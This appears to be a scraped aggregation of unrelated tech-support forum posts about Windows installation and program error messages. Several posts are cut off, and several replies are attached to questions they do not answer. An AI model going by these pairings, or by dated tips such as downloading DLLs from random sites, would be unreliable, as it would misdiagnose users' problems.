# Error message when trying to reinstall program

Q: Error message when trying to reinstall program

My daughter is using the Scholastic Phonics Reading program, and I unistalled the program a few weeks ago (at least I thought I did) because of a different computer issue we were having. Anyway, having resolved that issue, I tried to reinstall the program. When I put the CD-Rom in and click on the setup, the install wizard comes up and I have a choice of playing the game or uninstalling it. I thought I had already uninstalled it, but hit uninstall anyway. It gave me the message: "could not open install.log file". When I hit play, thinking perhaps I had actually not uninstalled it, it gives me the error message, "handler not defined #quicktime version". Any help would be very much appreciated, as my five year old is very excited to get going on this software.

I need help...

I'm trying to reinstall MSE (W7). It had been working perfectly until I starting receiving error/failure messages last week.

I have removed MSE using all the instructions provided on this website and others.

I keep receiving Error Message 80070645 when I try to reinstall MSE.

Any help (other than the most basic of offerings) would be greatly appreciated!

Thanks!

Was unable to DL Win 7 updates (error codes 80071A91, 80070643). Had previously formatted HD and installed Win Home Prem 7 SP1 32 Bit over XP. Ran for 3 years flawlessly. Started getting update fails about 2 weeks ago. Unable to resolve; contacted Microsoft and was told problem can only be resolved by reloading Win 7. Have attempted 3 times. Now PC is completely inaccessable and each time I get, after the install process goes thru all steps, the following error message: ''The computer restarted unexpectedly or encountered an unexpected error. To install Windows, click "OK" to restart the computer, and then restart the installation.'' I'm somewhat screwed as I need PC for work......any suggestions, please?

Hello Everyone, I'm new to the board and I just want to start off by saying thank you to any help you can give in advance.

Here are my computer stats:
Acer Aspire One 7741Z
17.3" Display
3GB of DDR3 Memory
250GB Hard Drive
Windows 7 64 bit

My issues started with me getting a trojan.agent. I had several trojans and viruses and I could only be in safe mode for any extended period of time. If I started in normal mode, I would get the BSOD in about 2 minutes.

I went through a number of steps to try and correct the problem under the supervision of another forum. We did combofix and a million other things it seemed the problem remained.

Finally, I just decided to reinstall windows. Everything went fine through the reinstall and I was really happy. But then when it restarted, it started normally and sounded good. But when it went to setup the computer I got this error message: to install windows, click ok to restart the computer and then restart the installation".

I restarted the computer and of course got the same message.

Also based on the research I've done, it seems like there are some changes that can be made in BIOS to help fix the problem. However, any of the changes they suggest, I can't find those settings (voltage, plug and play, etc.). It seems my options in BIOS are very limited.

Any help you give would be great. It could save me from buying a new laptop. Thanks.

(The app is only "naughty" due to its behavior, not its purpose lol.)

Hi, we are having an issue with an app but I don't think it's the app's fault. I think it's a Windows issue. My parents have had the Peachtree Accounting 2006 program on their approx. 7 year old basic Gateway XP SP2 computer since fall 2005. In October 2006, it starting giving those "(Peachtree) has encountered a problem and must close" error messages... BUT: the weird thing is, it *only* happens after you have already intentionally exited the program anyway; and also, if you have used Peachtree within a session, that error message will often appear on the screen at the next boot up. Even though no Peachtree elements are set to run automatically at start-up.

The only thing I can think of that changed anywhere near the time this started is that I had to manually remove a Norton Internet Security suite. But, from what I can tell by looking in Event Viewer, these errors didn't start until a couple months later, when Peachtree had been used without issue at least a couple of times.

So, as of now this issue has not stopped them from being able to use the program, and it has never happened *while* they are using it, only after intentional program close or next re-start. But I don't know if it might get worse, and if it did, I'm the one who'd need to fix things but I am only in town every few months. I'm here now, so do you think I should reinsta... Read more

@green13,

I understand Adobe Flash will not update due to brccmctl.

Have you tried HardBeatZ's suggestions to locate the program?  The program that brccmctl refers to is ControlCenter3 which is printing software for Brother's printers.

By chance, do you use a Brother printer?  If so, you can ensure that any brother process is ended in the task manager (right-click the task bar to get task manager).

The simplest option may be to temporarily disable the startup programs to update Adobe and then re-enable the startup prorams.  This can be done by going to start, searching for msconfig, opening this result, and unchecking the startup items.  Once Adobe is installed, go back to msconfig to enable the startup programs.

Let me know what happens.

Hi all-
I'M TRYING TO DO A CLEAN REINSTALL OF WINDOWS XP MEDIA EDITION ON MY *INSPIRON E1505. DURING SETUP IT PROMPTS ME TO ENTER THE SERVICE PACK PRO DISC 2, WHICH I NEVER NEEDED DURING PREVIOUS REINSTALLS. I'm using the restore disks that came with my computer.
I am getting the request for SP2 files during the install process, with
39 minutes to completion. The request says:
"Please install the compact disk labeled 'Windows XP Professional Service
Pack 2 CD' into your CD-ROM drive and then click ok.
You can also click ok if you want files to be copied from an alternate
location, such as a floppy disk."
Then, when I try to proceed without it:
"Files needed
The file "asms" on Win Pro CD-ROM is needed
Type the path where the file is located." and it indicates D:i386.
HOW TO FIX? I HAVE NO OTHER COMPUTER TO GET THIS FILE FROM, AND CAN'T GET INTO REGEDIT. I'M HOPING IT'S NOT AN OPTICALDRIVE ISSUE. THANKS-SORRY FOR ALL CAPS-Keys were stuck.

I know my hard drive is working because the current version of windows I have on it loads fine and I can access my files. I've also ran chkdsk /f to fix any problems. I would really appreciate any advice.

You probably need a sata driver for Xp cd to see the hard drive. When you first start setup you will see "press F6 to insert driver"...driver should be on floppy disk and probably came with motherboard or is downloadable from motherboard mfgr site.

When I try to open a program on the desktop or start menu I got an error message that says "This file does not have a program with it for preforming this action. Create am association in the Folder Options control panel"

I did that and clicked the "new" button, I wrote EXE in in the file type bar and chose application in the file type but it didn't help

I tired to use system restore but I get the error message

I found a way around this by right clicking on a program and choosing "run as" and pressing OK, most programs work this way

Hello, I'm back, I'm afraid.

I've had a little problem and it seems my Windows XP OS has got some errors but I don't know how to fix it.

One I've had is when I've tried to install/reinstall WM Recorder which installed fine in the past, but I now get the following message when I try to install it:

"Encountered a sharing violation while accessing [File path/File name]."

I've been in touch with WM Recorder support and they tell me it's a Windows error and not a program error. I am using a home, not work, computer and I'm the only user.

Another problem I've found is I've been playing one of my games and while playing a message popped up saying that it couldn't access a file and that it might be read only etc. and I think this is linked.

The only thing I can think of is a Windows Repair with my Windows CD. Is there another easier way to fix these errors?

I've been trying to search this, but all the solutions I've found do not work for me. I'm getting the error message "windows cannot access the specified device, path or file. You may not have the appropriate permissions to access the item" when I try to do pretty much anything. I've gone through some suggestions I found on other forums, and they either do not apply to Vista or they are unable to be completed because I get that message when trying to open anything up.

If I go to my menu and open IE by clicking on "internet" it will open, but that's the only thing I can do. I tried starting in Safe Mode and couldn't get it start that way, it did however take an extra long time starting up.

Can someone help me with this in simple terms? I'm not a big tech person, and it's even harder when my computer won't even let me go through with some of the fixes I've seen suggested. I've heard that antivirus programs and IE can be part of the problem...I'm going to try uninstalling AVG, but I've had that for a long time with no problems so I doubt that's going to work either. The only thing that's happened between my computer working and what it's doing now was an IE update. I don't want to uninstall that though because it's the only program that actually willl open up for me!

Also, windows keeps popping up with an update but it's not seeming to work...and there is an icon... Read more

A:error message when opening a program

here your profile is limited on the normal user privileges.. meaning u cannot install softwares that adds new values to the registry. u need the administrator to add ur account under the security tab of each of the files, regedit.exe and regedt32.exe .. otherwize, see if u can get the local administrator password, login and install the program ..

or maybe a policy, .. start > run > type gpedit.msc and press enter.
expand User Configuration > Administrative Templates >System .. u'll find "Disable registry editing tools" .. if it's enabled, then it's active. u can change it to disabled.

I run a registry program called Registrar Registry Manager to help me manually clean uninstall registry entries. It was working fine until I fooled around with a new tweak program. I think deleted something related to opening it.

Right now, when I click on the Registry Manager icon, I get an error message that says in the title bar "Registrar Registry manager: rr.exe - Unable To Locate Component", and below that it says "This application has failed to start because OLEACC.dll was not found. Re-installing the application may fix this problem"

After that though, the program does open just fine, but I get that error message consistantly every time I want to open it.

I did try reinstalling the program over the original, but that did not help. Then I uninstalled the program, then reinstalled it, but I still get the same error message.

I should mention that I run Vista Basic x64 and this program runs in the x64 Program Files.

Have any idea how to fix this?

Jan LaFata

A:Registry program error message

I don't know if I would agree to anything in that last post. Looking at google, RR.EXE is just your Registrar Registry program. Many of the people here don't agree with the use of any reg cleaners.

I guess I would first run a search on your computer and look for OLEACC.dll. If it doens't find it, then it's indeed missing. If it does find it, then you may have to replace it, because it's not working right if programs are asking for it. Either look online and try to download it, or copy one from another computer.

Hi, kevkr,

Generally speaking, the QUICKEST way to solve your computing problems is to do a little research on your own. The old saying that, "If you need a helping hand, look at the end of your arm", might well apply here. As you learn to help yourself, you'll be a more skilled and confident computer user, and eventually, you might even want to start helping others with THEIR problems. Whether you realize it or not, it looks like you ALREADY had half the battle won in resolving this, simply because you provided good information for us to work with.

I hope you'll think about that, because you did a good job of DESCRIBING your problem. That says good things about your ability to pay attention to details, which is the most important skill you need when faced with ANY computer problem. I say all that because this site and others like it can put skills like yours to good use helping others who aren't as detail-oriented as you are.

That being said, I get the feeling you DIDN'T do your homework before posting this, because there's a good chance the answer to your problem is waiting for you at the McAfee website.

I have Windows XP Home, sp2. I recently had to repair Windows XP, and when I tried to use Quicken 2005, it didn't recognize it. So I tried to reinstall Quicken 2005, got it installed once, but it wouldn't let me set up my financial institution. So I uninstalled Quicken, did all the things Quicken said I should do, to clean out any leftover Quicken files on my hard drive and registry. I have been working with Quicken for two weeks now, to no avail. It keeps coming back with the error message #1610, after it starts to install Quicken. That error message is "configuration data is corrupt, etc." Yesterday Quicken's tech support called me and we tried again. They even gave me another Quicken 2005 to use in case my cd was defective, still same message. They said they have done all they could. that they felt it was a Microsoft problem. I went into Microsoft and searched for that error message and yes, it is a microsoft error message, they state that, but give no solution to solving it. So I wondered if you all have come accross this and know how I can fix whatever the problem is. Got to be something missing in my registry or something. I can install and have installed other programs, no problem. Just Quicken 2005. Help!! Need my quicken. Thanks. Josephine Hudson

When opening a program i downloaded i get a error message, can anyone please give me some help on this one as i do not have a clue what it means or what i have to do. The error reads

C:\Documents and Settings\All Users\Documents\file i downloaded.exe is not a valid Win32 application.

This has happened for a few programs i have tried to download and cant seem to get them to work

thanks for any help

Hello and to BC

Secondly, what type of program are you trying to download, if its a simple program such as an AV , or a free game or something like that, from a trusted site, it should not be giving you an error such as that

if its an older exe file maybe it just won't work with your xp, Just a couple of thoughts to toss out there
Hope to hear from you soon

I want to install "SpywareBlaster" 3.3, but I can not remove 3.2. as recommended. When I try to uninstall 3.2 there is an error message displayed, the essence of which is: "The uninstall log file D:\SpywareBlaster - - - .dat" is in a format not recognized by this version of the uninstaller. Cannot uninstall." I have never run into this problem before. [I am running XP Pro, SP2.]
Is there a solution? Thanks. {redoak}

Open With, Choose Program Problem
________________________________________

When I right click on a file, any file and from the list of options I choose "Open With", the menu then shows several programs, the last option being "Choose Program".

When I click on this "Choose Program" it always used to display ?Browse? but now does not and instead I get an error message as below:

?This file does not have a program associated with it for performing this action. Create an association in the Folder Options control panel?.

How can I remove this error message and get the "Choose Program" dialog box to display the ?Browse? options of programs to choose from again?

I am using Window XP Professional, Version2002, Service Pack 3.

A:Open with choose program error message

First off, Right click the file and Properties. what is the files extension? (ex) .jpg, mp4, .pdf etc. Next you must Google what program opens this extension. If you have that program already installed, then in Windows Explorer/Tools/Folder Options/File Types scroll down to the extension (ex) .jpeg or whatever, and select the program that opens it (ex) Windows Picture and FAX viewer or whatever.

I downloaded Driver Detective to my laptop, used it to find drivers, then uninstalled it when I was done.

Now, when I restart the laptop, I get an error message that says Driver Detective is not working, file not found.

It appears that there is a remnant of the program still on the computer that is pointing to a file that no longer exists.

I can't find the remnant.

Is there a program that finds those things?

So earlier today I heard a song in a Youtube video that I wanted to find the name of so that led me to this software called: Tunatic.

After downloaded the setup file, I ran it but it gave an error: runtime error 216. The setup then closed.

Something about the error message didn't look like. It didn't look real. I googled the error message and found out that is was linked to a virus. Now I'm scared.

I did a quick scan using MalwareBytes and Microsoft Secrutiy Essentials and found nothing. I am currently doing a full scan using MalwareBytes.

Maybe the error message is an actual error but from what I found on Google, I was only able to find it being linked to a virus and nothing else.

So what do you think? Am I just worrying too much? Do you know of another cause for runtime error 216?

Hi
For any program that I've installed recently and am using for the first time, I get a .NET Framework error message which says:

Please set registry key HKLM\Software\Microsoft\.NETFramework\InstallRoot to point to the .NET Framework install location.

As I don't know much about the registry, I ran a google search with the error message and got a thread in another tech support forum saying that it was a virus. I ran AVG Virus Scan and got no problems and I ran my Registry Mechanic and it fixed the normal things, but the problem is still there.

Any help on this would be appreciated. Thanks in advance.

Hey there,

Started using my freshly installed Windows 8.1 Pro this week...
After a few days I started noticing something odd and have no idea why this started happening.

When i go to a file (any filetype...i tried like 10..) and click "choose default program..." in the context menu, the following error message will always come up:

Sure i can go to Config panel > Select default programs etc.
But this is odd... since i am 100% confident it used to work fine before.
I already did a 'sfc /scannow' checkup with an original 8.1 Pro x64 image but it says integrity is completely fine.

Any idea what might be causing this?

Could it be a random piece of software i uninstalled which was perhaps freeware and did not state it was Windows 8 compatible, leaving a cluttered registry key which is affecting this command from my context menu?
(A little far fetched perhaps...but i really can't think of anything else).

Let's find out which specific programs are the problem

Open msconfig and on the General tab choose "selective startup" (uncheck all three items) and reboot. Does the problem still occur? If not, start adding items back to msconfig one or two at a time, rebooting after each change, until the problem reappears and you'll have identified the offending process. This is clearly a time consuming procedure, but it is the best way to determine if some process loading with the system is the cause of your problem.
After you've isolated the cause, do not use msconfig to permanently disable the process. Instead, if it is a service go to START - RUN and type: services.msc (then press enter) and disable the service OR, if it a program, you can download & run a simple app such as Mike Lin's Startup Control Panel (http://www.mlin.net/StartupCPL.shtml) to enable, disable, or otherwise manage startup programs.

Once installed, it will launch Hijackthis.
Click on the Do a system scan and save a logfile button. It will scan and the log should open in notepad.
Click on "Edit > Select All" then click on "Edit > Copy" to copy the entire contents of the log.

Therefore, if you use this program please use the instructions below to access the options screen where you should enable/DisableAskDetections before using AdwCleaner.

Using AdwCleaner is very simple. Simply download the program and run it.  You will then be presented with a screen that contains a Search and Delete button.  The Search button will cause AdwCleaner to search your computer for unwanted programs and then display a log showing the various files, folders, and registry entries used by these programs.

To delete these unwanted programs simply click on the Delete button, which will cause AdwCleaner to reboot your computer and remove the files and registry entries associated with the various adware that you are removing.  On reboot, AdwCleaner will display a log showing the files, folders, and registry entries that were removed.

Hello Maussie,

At what point are you getting that message? What did Ewido fix for you, by any chance did you save those scan results?

Click Start>Run and type in sfc /scannow (there is a space between sfc and /) and let it scan for missing/corrupt files. You may need your Windows XP Install disc so have it handy.

Let's try an online scanner:

Please run an online scan at http://www.pandasoftware.com/products/activescan.htm *Requires Internet Explorer.
Make sure you click the "Free Online Virus Scan" in the upper right hand corner of the page under the Free use Activescan header. We do NOT want the default spyXposer scan. Click on the Scan your PC button & a 'pop up' window shall appear. * ensure that your pop up blocker doesn't block it
Click On 'Scan Now'
Begin the scan by selecting My Computer
* You needn't remain online while it's doing the scan but you have to re-connect after it has finished to see the report.
If it finds any malware, it will offer you a report. Click on see report
Then click Save report
Post the contents of the report in your next reply along with a new HijackThis log.
* Turn off the real time scanner of any existing antivirus program while performing the online scan

Hi: my first post and I need help. It seems like I have a very nasty virus and I admit I feel very stupid.

I use Vista 32 bit Service Pack Two.

Basic Problem: I cannot open Word, Disc Clean up, RKILL, Malaware OR ANYTHING. That is because every time I try I keep getting a regular looking dialog box with this exact message:

In Blue Bar accross the top "Open With"
Then in grey area : "Choose the Program you want to open this file"
File iexplore.exe

Now in White area : Internet Explorer Microsoft Corporation (with the regular Microsoft logo)
Other Programs
When I hit the + These programs show up: Adobe, Media Center, itunes, Word, Notepad, Paint, Real Player

Of course none of these work. Then there is BROWS . . . IF NONE OF THESE WORK BROWSE THE WEB
AGAIN, nothing works

Steps I have taken to try to fix.

Run Internet Option to remove browsing. FAIL

Finally got the rkill--and got this message in my notepad :
This log file is located at C:\rkill.log.
Please post this only if requested to by the person helping you.
Otherwise you can close this log when you wish.

Rkill was run on 04/21/2011 at 21:51:01.
Operating System: Windows Vista ™ Home Premium
Processes terminated by Rkill or while it was running:

A:Reinstall XP Home How do I reinstall all my Program Files I Have?

You installed a new version of XP in the same folder as your old one instead of repairing the one that was there already. Your programs are there, but not "installed". You need to reinstall all the programs to create their registry entries and shortcuts.

You probably have 2 "Windows" folders, too, with different names. Go to Start > Run, and type:

%windir%

I have not been able to install the drivers for my HP C6180 All-in-one printer on my WIndows 7 Ultimate 64 bit system. Every other program installs fine, just the HP software is a problem (I have tried installing drivers for two different HP printers with the same results). When I launch the setup.exe program, it goes through the extraction process then it dies... I've watched it in the task manager and it disappears after 3 or 4 seconds. There is no error displayed but in the Winodws Application Event log it shows this error:

I'm trying to install this free utility "Windows Sysinternals" on my daugther's laptop that I've been using for quite some time on my home computer. http://www.technet.microsoft.com/en-.../bb963902.aspx. It works great with Windows XP. My daughter's laptop is a Dell Inspiron 640m with Vista install. I have no problem with the intallation and opening the program once it's installed. Then I go to the "Logon" tab in the program to see if some of the software can be removed from the startup menu. When I right-click one of the items on the list and click "search online" I get the following error message. "A previous install did not complete correctly. Finishing install." I've tried deleting the software and reinstalling and that doesn't work. I still get the same error no matter how many times I do it. I'd really like to be able to use this program to remove unneeded programs running in the background that are eating up valuable computer resources. Can you please help?

Hi, I know this isn't much help but I've noticed a few of the sysinternal tools behave strangely in Vista.

You may already know this but if you go to Control Panel > Performance Information and Tools, you get a pretty neat Control panel for managing startup programs, and a few other bits and pieces.

Running uTorrent, you are high-risk for infection. If it wasn't the e-mail, it would have been something else, eventually.

Those are two of the malware. There's probably more. You can always assume that the only executables running from temporary and documents folders are malware.

Hi

I have just purchased a small digital camera that came with Ulead PE 3.0.

I went through the installation wizard for this software and it seemed to install correctly.

The icon for PE3.0 now appears on my desk top however when I double click on it I receive the following message:
IPE30 this program has performed an illegal operation and will shut down.

I check the 'details' of this error message and it says:
IPE30 executed an invalid instruction in module U32COMM.dll at 015f:4a10a40d.

Does anyone know what I have done wrong? If I need to uninstall and reinstall the software - how do I go about doing this?

Thanks

I do not have the installation disk any more. I will try now to download Win 7 Entreprise 64 bit and give it a try...
I can access the files using Hiren's Boot method (mini windows 7 bootable version). But in this situation I can run FRST only for this Operation System, not for the dead one... Mini windows 7 is 32 bit, even if computer OS is 64 bit. Is it a possibility to differently configure FRST to run for dead OS files?
What do you suggest to try in this situation?

Hi,

I've spent hours trying to install the Microsoft Home Use Program on my personal notebook PC at home with no success. My workplace enables me to purchase a licensed copy at a cheaper rate to put on my home computer, whilst I remain employed by them.

I click on the link to http://hup.microsoft.com/.
Select the country "Australia".
I enter the program code that work gave me.
I check my work email account and receive the email successfully.
I open the email which says "congratulations, you are eligible to purchase the home use program for \$28".
I click on the green "Buy Now" button.

Then, this is where it all goes wrong.... Instead of taking me to the screen that allows me to purchase my license/product key and download the software to my PC, the screen reverts back to the previous one which asks me for my corporate email address and program code! I am going around in circles! There are no error messages.

I have tried turning off the antivirus program and I have tried cleaning and fixing my drives. I have a brand new ASUS notebook PC model PRO50G with stickers on it saying windows vista and intel pentium.

I have had my Dell 8700 for little over a year and have had problems from the beginning.  I am 72 years old, and I am at my wits end!!!

A hard drive was replaced in the summer of 2015, but I have still had problems with the computer shutting down and my having to refresh it to factory setting.

I thought updating to Windows 10 would solve some problems, and I did this in October, 2015.  Everything was fine until a couple of months ago.  The end result was when I tried to refresh the computer to factory defaults, it went back to 8.0 or 8.1, and I evidently lost something in the process.
Now, I cannot update to Windows 10 and when I tried to resinstall the Dell Operating System, I get for both:  "WE COULDN'T UPDATE THE SYSTEM RESERVED PARTITION."
I DO HAVE A SYSTEM BACKUP ON 20 CDS (MADE WHEN I HAD WINDOWS 10).  Could I reinstall the system with these backupdisks?  How do I do that?  I also have a Dell 2 Boot USP stick, I have a recovery stick, too, but it semed that when I used this, I received a message that not all files were recovered
What should I do at this point?

A:Error message when trying to update to Windows 10 or to reinstall operating system 8.1: We couldn't update the system reserved partition."

On MBR disk, Windows 10 requires a 500MB system reserved partition, while 100MB in Windows 7, so you can try to extend system reserved partition.
In disk management, you can only extend partition using the unallocated space next to its right side. so even if you shrink D: drive, the option to extend the efi partition is still grayed out. My suggestion is to use a third party software, AOMEI Partition Assistant, both the standard (free) or the Professional(paid) version can extend partition as long as there is unallocated space on that hard drive. to see more information read:

A:Corel BluRay WinDVD Program Error Message - WinDvd Information Service is not re

Just a thought on Corel products from a looongtime user. I have taken Corel's WindDVD off of computers before that were having problems, especially the Sony VAIO line (which is no longer made). Corel is not the original Corel of 30 years ago. Corel products have always been buggy and prone to causing problems from the first time they came out with CorelDraw 3.0 and up. Most pro graphics shops do not use Corel graphics products simply because of that fact.
Corel uses its proprietary Protexis Licensing Service on many of its products. It actively monitors and calls home every time you boot up to verify authenticity. If you either delete it or disable it in Services, the product will not boot. Keep an eye on it, it has been known to cause problems such as you had, and worse.
Starting around 2001 Corel started acquiring various products that were relatively dated or 2nd-rate such as Word Perfect, Ulead, Roxio, Pinnacle Video Editor (with a reputation for buggy and crash-prone products) and others in an attempt to bolster sagging sales. There were numerous internal conflicts, accusations of insider trading on their stock, and finally they left their original home in Canada and move to Teipei where things deteriorated further. They then started to outsource R&D....not a good idea by any means. Then came more layoffs, particularly in engineering and quality assurance (aka customer service).

When moving or renaming files I frequently get an error messages informing me that "The action can't be completed because the folder or a file in it is open in another program". This typically happens with the second or third folder I try to rename or move. Navigating away to another folder and then coming back or closing explorer and reopening it usually helps but on the second rename or move I'm back to square one. I've been reading and searching on the forum and this is what I have tried so far:

stop the windows media player network sharing service
pause indexing
temporarily disable antivirus software
used the system file checker to check integrity

all to no avail. This is without a doubt the most annoying "bug" I have run into so far as it makes it virtually impossible to get anything done or organised. Has anyone found a real solution to this problem that does not involve manually unlocking every single folder before working with it (using 3rd party software - another option I have tried. Works but slows you down a lot)?

A:Can't copy or move files - error message "open in other program"

Hi linmix, welcome to 7F!

This may seem counter-intuitive, but, go to Control Panel >Folder Options >View Tab, and make sure the first box that says "Always show icons, never thumbnails" is not checked or ticked.

Try to replicate the problem.

See if that helps.

Hello All,

I am experiencing a very debilitating issue with my laptop. The error indicated on the title of this thread appears every time I try to open multiple programs on my machine; the error is present in at least the following applications: Windows explorer, HP SimplePass, HP CSI Shell, HP Support Assistant, HP Installer, Adobe Acrobat X Pro, Synaptics TouchPad V7.5... and perhaps more.

I include with this message a zip file with some recent logs (CBS. log, Errors Event Viewer, Last Scan.txt, Malware log.txt, Check Disk Event Viewer log) for your review so that both of us can save some valuable time.

Note: I am not by any means an expert on either computer software or hardware so, I would really appreciate if you help me out to sort this issue having that in mind.

A:Error message: "A problem caused the program to stop working..."

Hi,

Can you remember when this problem started to happen, if so had you made any changes to the computer such as software installations?

If so, you can try a system restore or use a backup if you have one to roll the os back to a time when all was working well and see if this solves your problem

I can almost guarantee that this is either a damaged or corrupt shell or a conflict with some software, as the fact that you can load the operating system up and get past post shows that it's not hardware related in anyway

Thank you
